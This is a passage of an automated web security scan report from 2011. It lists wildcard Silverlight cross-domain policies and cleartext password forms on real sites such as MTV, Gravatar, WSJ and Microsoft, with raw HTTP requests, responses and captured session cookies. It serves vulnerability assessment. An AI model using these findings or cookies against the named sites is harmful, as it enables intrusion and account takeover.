           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://om.dowjoneson.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
xserver: www357
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:13:55 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.8. http://spd.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:133a"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.9. http://spe.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Wed, 15 Jun 2011 10:33:28 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.10. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.11. http://stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 17:45:16 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

5.12. http://viamtv.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
xserver: www179
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.13. http://windows.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://windows.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: windows.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 492
Content-Type: text/xml
Expires: Wed, 15 Jun 2011 00:34:12 GMT
ETag: 1SLHTAjNm9LZrdKgMcT2MAXI3ANRN6JUyM+SrrTXpwk=
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-UA-Compatible: IE=9
Date: Tue, 14 Jun 2011 00:34:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">

<domain uri="http://windows.microsoft.com"/
...[SNIP]...
<domain uri="http://*.windows.microsoft.com"/><domain uri="http://explore.live.com"/><domain uri="http://*.explore.live.com"/>
...[SNIP]...

5.14. http://js.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: js.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 438588200300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Tue, 14 Jun 2011 00:34:27 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.15. http://www.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279472432300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:08 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

6. Cleartext submission of password

There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://community.mtv.com/Overlays/LogIn.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112111260&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...

6.2. http://en.gravatar.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:30:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 9877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</h4>
   <form action="/sessions/emails%252F" method="post">
       <p>
...[SNIP]...
</label>
           <input type="password" class="text" id="account_password" name="pass" />
       </p>
...[SNIP]...

6.3. http://en.gravatar.com/site/login/%252F

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /site/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</p>

                   <form method="post" action="/sessions/">
                       <p>
...[SNIP]...
</label>
                           <input type="password" size="30" name="pass" id="account_password" class="text"/>
                       </p>
...[SNIP]...

6.4. http://members.pega.com/login.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /login.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login.asp HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB; __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.8.10.1308054477; __utmz=87550468.1308054615.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87550468.1252779431.1308054615.1308054615.1308054615.1; __utmc=87550468; __utmb=87550468.1.10.1308054615; test_cookie=cookie_value; nocheck=1

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:35:52 GMT
Date: Tue, 14 Jun 2011 12:36:52 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Set-Cookie: pega%5Fautolog=000; expires=Wed, 13-Jun-2012 04:00:00 GMT; path=/
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 35546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="text-align: left; border: solid 1px #CCCCCC; width: 95%; height: 500px; margin: 20px 0px 20px 0px; padding: 0px 10px 0px 10px;">
                       <form action="" method="post" name="login_form" id="login_form" onsubmit="return validateFields(this);" autocomplete="off">
                           <input name="submitted" type="hidden" id="submitted" value="1" />
...[SNIP]...
<td width="713"><input type="password" name="password_display" id="password_display" class="input_field" size="35" maxlength="25" />
                                       <input name="password" id="password" type="hidden" />
...[SNIP]...

6.5. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

6.6. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

6.7. http://www.livewithoscar.com/Calendar.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Calendar.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Calendar.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
